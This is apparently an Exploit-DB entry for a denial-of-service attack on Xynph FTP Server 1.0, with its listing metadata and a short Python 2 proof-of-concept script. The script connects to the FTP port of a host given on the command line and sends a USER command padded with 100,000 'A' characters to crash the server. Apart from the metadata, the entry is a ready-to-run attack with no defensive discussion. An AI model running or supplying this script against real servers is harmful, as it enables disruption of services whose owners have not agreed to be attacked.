[] NeoSense

Xynph FTP Server 1.0 - USER Denial of Service

Author: freak_out
type: dos
platform: windows
port: 
date_added: 2011-01-05 
date_updated: 2016-09-27 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt16000/15905.png 
application_url: http://www.exploit-db.comxynph10.zip

# Exploit Title: Xynph 1.0 USER Denial of Service Exploit
# Date: 04.01.2011
# Author: freak_out
# Version: 1.0
# Tested on: Windows XP SP3
# Type: DOS/POC
# Greetings: anco, mahjong, puddy, st!x, war10ck, fraggle, DarthShredder, krzym, starslayer, db
# E-Mail: freak_out@phcn.de

#DoS:
#!/usr/bin/python
import socket
import sys

buf = "A"*100000
host = sys.argv[1]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,21))
print "Send USER " + buf
s.send("USER %s\r\n" % buf)